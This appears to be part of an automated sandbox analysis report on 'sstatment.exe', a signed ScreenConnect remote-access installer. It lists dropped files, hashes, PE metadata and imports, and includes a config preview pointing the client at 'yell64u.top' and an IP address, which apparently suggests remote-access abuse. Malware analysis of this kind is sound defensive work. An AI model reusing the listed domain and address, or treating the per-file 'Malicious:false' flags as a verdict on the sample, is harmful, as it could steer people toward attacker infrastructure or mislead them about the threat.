                                                                                  Preview:..................6... .......... ...00...............PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.m#x....X.rYn....R_.ds...*.*......V..x[$]..}.*..b...". ...,....*|.F`.....E[`\6...G.m..$.K...IxAb..^."....@.^..G....bK.....F.+.E.*..p......2WBk......8...p......_u.mR.6.......xs.....jHX.)l....KA..F...u_}.G.pF.`.i....K..JQ.C..cc..[..-06.d{...%TtG..'.....9.W5W.~)..Qlx.d.gT....gX.#L..4{......cG..h..$...ie.....W..)X...#o..dku..[.VQp..c?...........)..+w.p.H....I...:...r...6?....V...{.R...?.w..i......sC[..R.t!_v.A.....-kzL.8...d.(..6I.....&.R..1.....p.?.Vt..@>^....{p.s.[..c9.k~k.B....(.......%=........x6.6*:..Vu.. ......".;g..f....o}..+..n.w..%.j.0...X:.^...o....$.8@M]B..J..R.. ..a....n.<.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):432221
                                                                                  Entropy (8bit):5.375169839047906
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauw:zTtbmkExhMJCIpErh
                                                                                  MD5:F2FA3DF8097C2A464710A3296832A6D8
                                                                                  SHA1:C512FD5AEDD3229F8E178091D3F8809EC3172717
                                                                                  SHA-256:B05A32D076304E9F76630D23F75BF02C86CCB2355A09386593DEAC7A5FDB200F
                                                                                  SHA-512:A0C377913C1A378C6F86FFD09E9F9F9D8CCB921A8C5DA4F2EEB62DD84FFFB25346CD135BB61F38C84757FDFC0ACD236A5100F7C65575DB753BE8A6BCDB1600AE
                                                                                  Malicious:false
                                                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):556
                                                                                  Entropy (8bit):5.043059862701304
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUiQCD9Ce/vXbAa3xT:2dL9hK6E46YP679HvH
                                                                                  MD5:C5CFAE12350984CB65DFED7D7A3B81BF
                                                                                  SHA1:36376B580009CBBE75D7860E41B529913E48B0CE
                                                                                  SHA-256:4D6090BC2A5D0B943D7052A3C57F4D12BFC7A78F8B6CC42D47603BF560737CCE
                                                                                  SHA-512:C7E7B129A9339E5D149FA8D114CD3A36CEFC92CB22DE08D40DF8F07228BEB0910155F72D0DFCE36ABE387743F69F8AF75B7F7A36B466834F25FE4B720CB17F77
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>yell64u.top=85.239.34.190-15%2f10%2f2024%2017%3a20%3a06</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):556
                                                                                  Entropy (8bit):5.043059862701304
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUiQCD9Ce/vXbAa3xT:2dL9hK6E46YP679HvH
                                                                                  MD5:C5CFAE12350984CB65DFED7D7A3B81BF
                                                                                  SHA1:36376B580009CBBE75D7860E41B529913E48B0CE
                                                                                  SHA-256:4D6090BC2A5D0B943D7052A3C57F4D12BFC7A78F8B6CC42D47603BF560737CCE
                                                                                  SHA-512:C7E7B129A9339E5D149FA8D114CD3A36CEFC92CB22DE08D40DF8F07228BEB0910155F72D0DFCE36ABE387743F69F8AF75B7F7A36B466834F25FE4B720CB17F77
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>yell64u.top=85.239.34.190-15%2f10%2f2024%2017%3a20%3a06</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1590
                                                                                  Entropy (8bit):5.363907225770245
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                  MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                  SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                  SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                  SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.4178763017262117
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:4x4buvO+xFX4vT5hUe9ptwNqcq56AduNSiAoiR14kdZq+ommXrz4kToArGAduNSU:lbcsTXHwQpYf9i8kdwLmm34bt
                                                                                  MD5:4F6A134AAD802C7F352475FA5AF54807
                                                                                  SHA1:320BCEF2C9D8ADDBDD620F9DAB4DA5B769D0F59A
                                                                                  SHA-256:239B91667E3D3163CF9C89C955CFB908E031558AFAAE7A41E63890F2354A55E1
                                                                                  SHA-512:4628CA8191653EBFCE092D18CC80E9E6B5B6A316A2189C5FA8A1EF58DE57842CA9FEBB01064CC71402D148AA923F24A6232C17CFC82A0C72608759F96C9AA6F3
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.4178763017262117
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:4x4buvO+xFX4vT5hUe9ptwNqcq56AduNSiAoiR14kdZq+ommXrz4kToArGAduNSU:lbcsTXHwQpYf9i8kdwLmm34bt
                                                                                  MD5:4F6A134AAD802C7F352475FA5AF54807
                                                                                  SHA1:320BCEF2C9D8ADDBDD620F9DAB4DA5B769D0F59A
                                                                                  SHA-256:239B91667E3D3163CF9C89C955CFB908E031558AFAAE7A41E63890F2354A55E1
                                                                                  SHA-512:4628CA8191653EBFCE092D18CC80E9E6B5B6A316A2189C5FA8A1EF58DE57842CA9FEBB01064CC71402D148AA923F24A6232C17CFC82A0C72608759F96C9AA6F3
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):0.06895163310047703
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOFfWbQQMH2GyVky6l3X:2F0i8n0itFzDHFFsQQMWE3X
                                                                                  MD5:C85807D9C86F61CC55E9E5E204EE1B2B
                                                                                  SHA1:D11808CD08870E93F0D382F217411E2F99422CF9
                                                                                  SHA-256:9E033D6440DF6DF635B3C7D0CC18ECAE3B072D15711B6B580DE8354F1D197FBD
                                                                                  SHA-512:7515D40AA54B9E7ADF3D701F986CFB7A28FD223CCE00A2D587FAA9E2BDF1362EF4F3F0273246E90BAB103127F180C3192D6AE567FA4363D195E46E9C1834D929
                                                                                  Malicious:false
                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.7958330715534179
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:y8PhDuRc06WX4uFT5h9ptwNqcq56AduNSiAoiR14kdZq+ommXrz4kToArGAduNSU:dhD1eFTJwQpYf9i8kdwLmm34bt
                                                                                  MD5:B03900734CC7AD05537941CF8479E916
                                                                                  SHA1:3E8E219567B8D01F45C7BC49DD2282CCAC4239F4
                                                                                  SHA-256:906C78A62BEA376DB3E56B513AB002E65E5F73A2054E3C94B9A8A7B2D9BC94C4
                                                                                  SHA-512:491B4019E71A93CF7184643D0BC8666AD457F8FC5D7D9718A1C904471CF3F83C61D4DB66D1DB477F5E4C714E382AF0132ABD9ABBAEFA48456CA8256F87CD8276
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.7958330715534179
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:y8PhDuRc06WX4uFT5h9ptwNqcq56AduNSiAoiR14kdZq+ommXrz4kToArGAduNSU:dhD1eFTJwQpYf9i8kdwLmm34bt
                                                                                  MD5:B03900734CC7AD05537941CF8479E916
                                                                                  SHA1:3E8E219567B8D01F45C7BC49DD2282CCAC4239F4
                                                                                  SHA-256:906C78A62BEA376DB3E56B513AB002E65E5F73A2054E3C94B9A8A7B2D9BC94C4
                                                                                  SHA-512:491B4019E71A93CF7184643D0BC8666AD457F8FC5D7D9718A1C904471CF3F83C61D4DB66D1DB477F5E4C714E382AF0132ABD9ABBAEFA48456CA8256F87CD8276
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.4178763017262117
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:4x4buvO+xFX4vT5hUe9ptwNqcq56AduNSiAoiR14kdZq+ommXrz4kToArGAduNSU:lbcsTXHwQpYf9i8kdwLmm34bt
                                                                                  MD5:4F6A134AAD802C7F352475FA5AF54807
                                                                                  SHA1:320BCEF2C9D8ADDBDD620F9DAB4DA5B769D0F59A
                                                                                  SHA-256:239B91667E3D3163CF9C89C955CFB908E031558AFAAE7A41E63890F2354A55E1
                                                                                  SHA-512:4628CA8191653EBFCE092D18CC80E9E6B5B6A316A2189C5FA8A1EF58DE57842CA9FEBB01064CC71402D148AA923F24A6232C17CFC82A0C72608759F96C9AA6F3
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):69632
                                                                                  Entropy (8bit):0.23281783852525628
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:oukDBAduNS3qcq56AduNSiAoiR14kdZq+ommXrz4kToArSwp9p:1GxpYf9i8kdwLmm34hw
                                                                                  MD5:94BEE54743A89DD81D66F1B8DCE57355
                                                                                  SHA1:6DDFED64BFDCF420F87DF224885DDE6EE4697C54
                                                                                  SHA-256:D8AB2D66BDB9A29968FBF0C8091D62FB721E35899E74252D998343CA4B7F0F44
                                                                                  SHA-512:71C5DE2804A0734723F63915BA9055FBA2405D8668EDD68C0B97BC1CCCA3D5334AB2B103C6F501F4EA762FC907FDF9945F38DFE3CF6D88379993B34BF0446A5B
                                                                                  Malicious:false
                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.429483929801877
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:sstatment.exe
                                                                                  File size:5'652'448 bytes
                                                                                  MD5:9aba870d429cb8fa53103ae4b7182af6
                                                                                  SHA1:5f5cea1da1f5238f76a547a1c1fab8b039a190b0
                                                                                  SHA256:9fa76b4ab82376d9486f051b2a7f0e2f584243296f94b2b4b30ea24fae05edd3
                                                                                  SHA512:78540cb97e1cf0bdc49a449ec55182ff4c9555a38bab15c4e28aef1ab237c78d2333bff95681884691b99feb2b0ec551b3f4d36a8353923aa14e522a93d8bf5b
                                                                                  SSDEEP:49152:IDex5xKkEJkGYYpT0+TFiH7efP0x58IJL+md3rHgDNMKLo8SsxG/XcW32gqkAfoo:c4s6efPQ53JLbd3LINMLaGUW39f0
                                                                                  TLSH:FE46E111B3D995B9C0BF063CD87A52699A74BC048722C7AF57D4BD292D32BC05E323B6
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                                                  Icon Hash:90cececece8e8eb0
                                                                                  Entrypoint:0x4014ad
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:true
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                                  Signature Valid:true
                                                                                  Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                  Signature Validation Error:The operation completed successfully
                                                                                  Error Number:0
                                                                                  Not Before, Not After
                                                                                  • 17/08/2022 01:00:00 16/08/2025 00:59:59
                                                                                  Subject Chain
                                                                                  • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                  Version:3
                                                                                  Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                  Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                  Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                  Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                  Instruction
                                                                                  call 00007F58F8B5173Ah
                                                                                  jmp 00007F58F8B511EFh
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  push 00000000h
                                                                                  call dword ptr [0040D040h]
                                                                                  push dword ptr [ebp+08h]
                                                                                  call dword ptr [0040D03Ch]
                                                                                  push C0000409h
                                                                                  call dword ptr [0040D044h]
                                                                                  push eax
                                                                                  call dword ptr [0040D048h]
                                                                                  pop ebp
                                                                                  ret
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  sub esp, 00000324h
                                                                                  push 00000017h
                                                                                  call dword ptr [0040D04Ch]
                                                                                  test eax, eax
                                                                                  je 00007F58F8B51377h
                                                                                  push 00000002h
                                                                                  pop ecx
                                                                                  int 29h
                                                                                  mov dword ptr [004148D8h], eax
                                                                                  mov dword ptr [004148D4h], ecx
                                                                                  mov dword ptr [004148D0h], edx
                                                                                  mov dword ptr [004148CCh], ebx
                                                                                  mov dword ptr [004148C8h], esi
                                                                                  mov dword ptr [004148C4h], edi
                                                                                  mov word ptr [004148F0h], ss
                                                                                  mov word ptr [004148E4h], cs
                                                                                  mov word ptr [004148C0h], ds
                                                                                  mov word ptr [004148BCh], es
                                                                                  mov word ptr [004148B8h], fs
                                                                                  mov word ptr [004148B4h], gs
                                                                                  pushfd
                                                                                  pop dword ptr [004148E8h]
                                                                                  mov eax, dword ptr [ebp+00h]
                                                                                  mov dword ptr [004148DCh], eax
                                                                                  mov eax, dword ptr [ebp+04h]
                                                                                  mov dword ptr [004148E0h], eax
                                                                                  lea eax, dword ptr [ebp+08h]
                                                                                  mov dword ptr [004148ECh], eax
                                                                                  mov eax, dword ptr [ebp-00000324h]
                                                                                  mov dword ptr [00414828h], 00010001h
                                                                                  Programming Language:
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 build 21022
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x533080.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x5462000x1dde0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x54a0000xea8.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x160000x5330800x5332000cb59c276652808eb7200fdad38bae5bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x54a0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  FILES0x163d80x86000PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.39622565881529853
                                                                                  FILES0x9c3d80x1a4600PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5111637115478516
                                                                                  FILES0x2409d80x1ac00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.4415614047897196
                                                                                  FILES0x25b5d80x2ec320PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9812068939208984
                                                                                  FILES0x5478f80x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                                                  RT_MANIFEST0x548ef80x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                                  DLLImport
                                                                                  mscoree.dllCorBindToRuntimeEx
                                                                                  KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
